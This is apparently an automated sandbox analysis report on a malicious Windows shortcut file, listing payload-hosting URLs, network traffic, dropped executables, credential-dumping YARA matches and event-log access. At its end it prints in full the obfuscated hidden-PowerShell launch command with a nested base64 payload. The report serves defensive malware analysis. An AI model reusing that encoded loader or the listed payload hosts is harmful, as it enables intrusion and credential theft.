Source: svczHost.exe, 00000014.00000002.4755964850.000001B90209A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/StaticFile/RdpService/87
Source: svczHost.exe, 00000014.00000002.4755964850.000001B90208F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/StaticFile/RdpService/87ice
Source: powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796
Source: powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa
Source: powershell.exe, 0000000D.00000002.3932623749.000002A482581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A4827AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df7
Source: powershell.exe, 00000003.00000002.3702779169.000001F3806EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/7fd1a89d0020dcffe37c334092d29597499af8b82a4f37fb75f7f3a0a1257f1e979bdbe
Source: powershell.exe, 00000008.00000002.3597293545.000001B580C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5
Source: powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F380690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766
Source: powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c
Source: powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svczHost.exe, 00000014.00000002.4757589094.000001B902A48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/MartinKuschnik/WmiLight
Source: powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.3472549645.0000020C67BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXzT
Source: powershell.exe, 00000002.00000002.3472549645.0000020C68D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3472549645.0000020C68D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492626000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B902A48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.3911058109.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000008.00000002.3597293545.000001B58114F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580D96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.00000166809B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.3490034644.0000020C7FAF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.3472549645.0000020C68EA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77A34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3742325021.000001F390078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3633648179.000001B590079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.00000166901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.00000166814F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.3490034644.0000020C7FA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3752962645.000001F3FBAB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3642064416.000001B5FCBF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4419408500.000002A49A5E9000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4754714057.000001B8FEF3E000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000003.4296169846.000001B8FEF7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.51:443 -> 192.168.11.20:49761 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_8952.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 45.2.myRdpService.exe.7ff727620000.0.unpack, type: UNPACKEDPE	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: 0000002D.00000002.4760412983.00007FF727B26000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: Process Memory Space: powershell.exe PID: 1804, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8952, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: svczHost.exe PID: 6444, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\svczHost.exe

Jump to dropped file

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\Temp\myRdpService.exe

Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC7BB50E95	2_2_00007FFC7BB50E95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB5F1C6	3_2_00007FFC7BB5F1C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB5FF72	3_2_00007FFC7BB5FF72
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB61380	3_2_00007FFC7BB61380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB60FE0	3_2_00007FFC7BB60FE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFC7BB451DA	13_2_00007FFC7BB451DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFC7BC19FD1	13_2_00007FFC7BC19FD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFC7BB777A6	24_2_00007FFC7BB777A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFC7BB78552	24_2_00007FFC7BB78552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFC7BB70E15	24_2_00007FFC7BB70E15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFC7BB7BC0C	28_2_00007FFC7BB7BC0C

Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\myRdpService.exe 5744321DFC2240023EF89A8D3A4B57C635FEDFEF0E265F1C8F7971AA9F635C34
Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\svczHost.exe B1D69CBC0A2D13B89500D37726AD9E01817C8890262E3CE4A561F82B63708B9A

Source: svczHost.exe.13.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3679
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3632
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3679	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3632
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904

Source: amsi64_8952.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 45.2.myRdpService.exe.7ff727620000.0.unpack, type: UNPACKEDPE	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: 0000002D.00000002.4760412983.00007FF727B26000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: Process Memory Space: powershell.exe PID: 1804, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8952, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: svczHost.exe PID: 6444, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump

Source: classification engine

Classification label: mal100.troj.expl.evad.winLNK@80/61@1/2

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5164:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6428:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6520:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6236:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6384:304:WilStaging_02
Source: C:\Windows\Temp\myRdpService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4104:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5844:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5668:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8604:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\STARTUAC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2428:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8900:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6384:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fc2smexb.wzt.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 0A3NB8ot11.lnk	Virustotal: Detection: 30%
Source: 0A3NB8ot11.lnk	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
